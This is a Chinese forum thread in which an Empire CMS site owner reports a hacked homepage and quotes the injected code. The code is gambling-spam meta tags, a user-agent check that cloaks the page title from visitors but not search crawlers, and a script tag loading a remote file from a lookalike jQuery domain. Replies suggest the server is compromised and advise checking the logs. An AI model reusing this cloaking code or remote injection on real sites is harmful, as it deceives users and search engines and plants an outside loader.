帝国论坛帝国网站管理系统交流区帝国CMS使用交流[求助]主页如何被串改的? 【本版专题贴子】  
主题:[求助]主页如何被串改的? [加入收藏夹]   

ai1
用户头衔:举人

精华贴   :0
发贴数   :162
经验值   :1539
注册时间:2012-01-31
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 1 楼]
[求助]主页如何被串改的?
今天发现一个来自泰国ip地址的黑客在百度上搜索到了本站网址,然后串改了主页代码。具体串改结果如下:
1)替换行内容为:<title>九游会·(j9)官方网站-真人游戏第一品牌</title>
2)替换行内容为:<meta name="keywords" content="j9九游会官网入口首页, ...
3)替换行内容为:<meta name="description" content="【&#12951;&#65039;KR带你斩大龙&#12951;&#65039;】「j9九游会官网」...
4)添加js代码:
<script>
    var userAgent = navigator.userAgent.toLocaleLowerCase();
    var searchEngines = ["spider", "bot"];
    var isSearchEngine = searchEngines.some(se => userAgent.indexOf(se) !== -1);

    if (!isSearchEngine) {
        document.title = "本站站名 - 本站站名:";
    }
</script>
<script src="https://jquery-min.org/3.6.3/min.js"></script>
请大侠们指教网站漏洞出在哪里。最厉害的一次是黑客串改之外还直接删除了web.config的一部分网页跳转设置参数。当然,这次本人已经更新主页替换了被串改的主页,而且后台设置阻止那个ip访问。

[该贴被修改 3 次,最后修改时间 2024-11-17 10:32:52 ]


时间是把金钥匙
2024-11-17 10:27:12 已设置保密 顶部 回复 引用 报告 编辑 删除

hibaidu
用户头衔:探花

精华贴   :0
发贴数   :3930
经验值   :11975
注册时间:2010-05-26
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 2 楼]

这是服务器都被控制了吧




2024-11-17 12:17:06 已设置保密 顶部 回复 引用 报告 编辑 删除

artery
用户头衔:举人

精华贴   :0
发贴数   :128
经验值   :718
注册时间:2006-01-08
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 3 楼]

服务器被当成肉机了,看一下吧,很多目录里也放进去了很多不知明的文件,我遇到过好几次




http://www.artery.cn

2024-11-17 22:42:20 已设置保密 顶部 回复 引用 报告 编辑 删除

zhxin
用户头衔:探花

精华贴   :0
发贴数   :3911
经验值   :10758
注册时间:2013-01-09
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 4 楼]

检查服务器日志




2024-11-18 06:48:57 已设置保密 顶部 回复 引用 报告 编辑 删除

快速回复
内容

表情
使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
     【进入高级模式】   (按 Ctrl+Enter 直接提交)
    顶部  加入收藏夹
关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议
Powered by: EBB Version 2.2.1